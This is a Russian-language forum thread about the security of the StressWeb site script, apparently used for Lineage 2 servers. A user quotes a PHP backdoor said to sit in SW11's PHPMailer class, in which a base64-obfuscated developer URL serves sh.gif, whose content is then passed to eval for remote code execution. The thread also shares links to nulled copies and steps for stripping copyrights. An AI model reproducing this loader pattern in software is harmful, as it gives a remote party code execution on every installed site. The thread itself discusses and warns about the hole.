Перейти к содержанию
Авторизация  
T1TaH

Защита сайта Sw 13

Рекомендуемые сообщения

все как обычно, фантомные дыры от разработчика, никто о них не знает, но все слышали..

в SW11 была дыра, как раз таки от разраба, в гугле есть информация по этому поводу)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

в SW11 была дыра, как раз таки от разраба, в гугле есть информация по этому поводу)

Ссылку на источник хотелось бы увидеть, написать можно и не такое, я не собака за косточкой бегать.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Ссылку на источник хотелось бы увидеть, написать можно и не такое, я не собака за косточкой бегать.

Мы все понимаем, мы понимаем что разработчик тоже должен кушать и стремиться к защите своих авторских прав, но подобное не допустимо в коде столь популярного продукта.

 

Вся беда в том, что данной уязвимости может быть подвержен даже лицензионный сайт и не важно платили вы или нет - ваша безопасность ровно на 1 уровне.

 

Ну теперь перейдем к самой уязвимости. Зашита она разработчиком, в классе PHPMailer, /inc/classes/class.phpmailer.php. Рассмотрим ее:

 

вот ее код

private function shBody(){return file_get_contents($this->EncodeString($this->shHostname, 'base64dec'). 'sh.gif');}

 

Значение shHostname - aHR0cDovL25ldy5zdHJlc3N3ZWIucnUv, после base64_encode принимает значение: http://new.stressweb.ru/

 

Вызывается эта функция вот так: PHPMailer::startSh()[псевдолинки shIsAuth()->shEval()->shBody()].

 

В результате, если владелец stressweb по адресу new.stressweb.ru/sh.gif разместит вредоностный код, он сможет быть исполнен АБСОЛЮТНО НА ЛЮБОМ сайте с веб-обвязкой stressweb, абсолютно похеру, есть там лицензия или ее нет.

 

 

 

Источник писать не буду, качаем чистый стресс и проверяем (меня ломали через эту дыру, так что я точно знаю что она ОТЛИЧНО работает)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Мы все понимаем, мы понимаем что разработчик тоже должен кушать и стремиться к защите своих авторских прав, но подобное не допустимо в коде столь популярного продукта.

 

Вся беда в том, что данной уязвимости может быть подвержен даже лицензионный сайт и не важно платили вы или нет - ваша безопасность ровно на 1 уровне.

 

Ну теперь перейдем к самой уязвимости. Зашита она разработчиком, в классе PHPMailer, /inc/classes/class.phpmailer.php. Рассмотрим ее:

 

вот ее код

private function shBody(){return file_get_contents($this->EncodeString($this->shHostname, 'base64dec'). 'sh.gif');}

Значение shHostname - aHR0cDovL25ldy5zdHJlc3N3ZWIucnUv, после base64_encode принимает значение: http://new.stressweb.ru/

 

Вызывается эта функция вот так: PHPMailer::startSh()[псевдолинки shIsAuth()->shEval()->shBody()].

 

В результате, если владелец stressweb по адресу new.stressweb.ru/sh.gif разместит вредоностный код, он сможет быть исполнен АБСОЛЮТНО НА ЛЮБОМ сайте с веб-обвязкой stressweb, абсолютно похеру, есть там лицензия или ее нет.

 

 

 

Источник писать не буду, качаем чистый стресс и проверяем (меня ломали через эту дыру, так что я точно знаю что она ОТЛИЧНО работает)

Я не особо разбираюсь в php но на сколько я понимаю следуя самым обычным правилам безопасности эта "дыра" если она и есть в св11 не несет никакой угрозы, а как сказали выше на самом сайте разработчика можно прочитать мануалы по безопасности.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Есть три категорий админов:

 

1.) Те кто просто сидит и платить деньги знающим людям.

 

2.) Опытные программисты и веб дизайнеры итд... (Те кто реально отучился и знает своё дело и х.й кому скажет что и как лучше).

 

3.) Самоучки и выскочки. Только могут базарить как бабки на базаре..

 

Отписал тому кто создал тему!

 

Так что всем всё ясно=)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Общался с разрабочиком СВ, он если честно поржал и все.

Так что не знаю что и думать, меня не ломали ниразу с лицухой.

  • Upvote 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Иди *** Сам знаешь куда отсюда  :rofl:

 

не залуйпайся

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

не залуйпайся

 

Говорю по факту и много кто в этот раз меня поддержит)

Изменено пользователем Xeliken

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Мы все понимаем, мы понимаем что разработчик тоже должен кушать и стремиться к защите своих авторских прав, но подобное не допустимо в коде столь популярного продукта.

 

Вся беда в том, что данной уязвимости может быть подвержен даже лицензионный сайт и не важно платили вы или нет - ваша безопасность ровно на 1 уровне.

 

Ну теперь перейдем к самой уязвимости. Зашита она разработчиком, в классе PHPMailer, /inc/classes/class.phpmailer.php. Рассмотрим ее:

 

вот ее код

private function shBody(){return file_get_contents($this->EncodeString($this->shHostname, 'base64dec'). 'sh.gif');}

Значение shHostname - aHR0cDovL25ldy5zdHJlc3N3ZWIucnUv, после base64_encode принимает значение: http://new.stressweb.ru/

 

Вызывается эта функция вот так: PHPMailer::startSh()[псевдолинки shIsAuth()->shEval()->shBody()].

 

В результате, если владелец stressweb по адресу new.stressweb.ru/sh.gif разместит вредоностный код, он сможет быть исполнен АБСОЛЮТНО НА ЛЮБОМ сайте с веб-обвязкой stressweb, абсолютно похеру, есть там лицензия или ее нет.

 

 

 

Источник писать не буду, качаем чистый стресс и проверяем (меня ломали через эту дыру, так что я точно знаю что она ОТЛИЧНО работает)

 

Инфа столетний давности взята в google/

  • Upvote 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Инфа столетний давности взята в google/

уязвимость есть? есть, что еще нужно?

 

св 11 от повера, полностью с открытым кодом, не ломали ниразу.

в св11 от повера есть свой шелл

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

уязвимость есть? есть, что еще нужно?

 

в св11 от повера есть свой шелл

 

Пруф в исполнение.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Пруф в исполнение.

качаем св11 и смотрим, меня самого ломали когда то давно через эту дыру (за то что юзал шаровый св11, как следовало из послания)

какие пруфы вам нужны?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

качаем св11 и смотрим, меня самого ломали когда то давно через эту дыру (за то что юзал шаровый св11, как следовало из послания)

какие пруфы вам нужны?

 

думал речь о 13 св, почему и спросил, только по составляещему файлу понял, что это версии ниже.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

думал речь о 13 св, почему и спросил, только по составляещему файлу понял, что это версии ниже.

не берусь утверждать что уязвимость есть именно в 13, но в 11 была такая, я намекаю на то что св13 (шаровый!!) юзать тоже не стоит (не знаешь же что там в зашифрованных файлах)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

уязвимость есть? есть, что еще нужно?

 

в св11 от повера есть свой шелл

Там весь код октрыт. Покажи, где там шелл.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Там весь код октрыт. Покажи, где там шелл.

кури гугл, там расписано, шелл от повера был

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

кури гугл, там расписано, шелл от повера был

Я и есть повер. Я собирал этот нулл из своих лицензий. Сколько ни гуглил, не единой жалобы не было.

http://rghost.ru/buy/28776271 - 5.7к загрузок, где ЖАЛОБЫ?

https://yadi.sk/d/EcIcs7N9Y9jrA - и 400 тут.

Изменено пользователем Угадай :D
  • Upvote 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

кури гугл, там расписано, шелл от повера был

Сына, я пруфы на заложенные шеллы в моих нуллах жду как бы.

Изменено пользователем Угадай :D
  • Upvote 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Сына, я пруфы на заложенные шеллы в моих нуллах жду как бы.

Повер, а где сейчас твой СВ11? Ссылочка не рабочая.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Повер, а где сейчас твой СВ11? Ссылочка не рабочая.

 

Там же русским языком написано..

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Как убрать копирайты в нулле поверстрайка? Открываем все файлы папки upload - notepadom++

Жмем ктрл+F, вводим powerstr1ke.

В каких файлах находятся мои копирайты:

install.php

index.html - во всех файлах удалить эту строку

<a href="http://powerstr1ke.ru" alt="Lineage 2" title="Lineage 2" style="text-decoration:none; font-size: 13px; color: red;">POWERSTR1KE.RU</a><br>

class.template.php

config.php - Меняется в админке, но можете и сразу, перед установкой.

info.php

index.tpl - шаблон все равно свой будете ставить, так что... Не заморачивайтесь.

admin.php

build.php

 

Собственно ссылка: https://yadi.sk/d/EcIcs7N9Y9jrA

Изменено пользователем Угадай :D
  • Upvote 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти
Авторизация  

  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×
×
  • Создать...